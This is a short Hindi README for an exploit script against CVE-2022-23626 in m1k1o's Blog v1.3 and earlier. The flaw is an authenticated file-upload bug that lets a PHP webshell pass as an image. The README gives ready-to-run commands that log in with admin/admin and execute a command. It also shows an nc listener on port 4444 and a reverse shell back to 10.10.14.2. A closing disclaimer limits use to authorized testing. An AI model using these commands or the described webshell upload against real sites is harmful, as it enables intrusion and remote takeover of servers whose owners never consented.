
m1k1o's Blog v1.3 और उससे नीचे के संस्करणों में फ़ाइल अपलोड भेद्यता के माध्यम से प्रमाणित रिमोट कोड निष्पादन।
ajax.php?action=upload_image एंडपॉइंट अपलोड की गई फ़ाइल प्रकारों का उचित रूप से सत्यापन नहीं करता है, जिससे एक प्रमाणित उपयोगकर्ता छवि के रूप में छिपा हुआ PHP वेबशेल अपलोड कर सकता है। इसके बाद हमलावर अपलोड की गई फ़ाइल को सीधे अनुरोधित करके निष्पादन को ट्रिगर कर सकता है।
requests लाइब्रेरीpip install requests
python3 cve-2022-23626.py --url http://target:8081 -u admin -p admin -c "id"
पहले एक लिसनर प्रारंभ करें:
nc -lnvp 4444
फिर चलाएँ:
python3 cve-2022-23626.py --url http://target:8081 -u admin -p admin -lh 10.10.14.2 -lp 4444
यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए है। इसका उपयोग केवल उन्हीं सिस्टम पर करें जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति हो।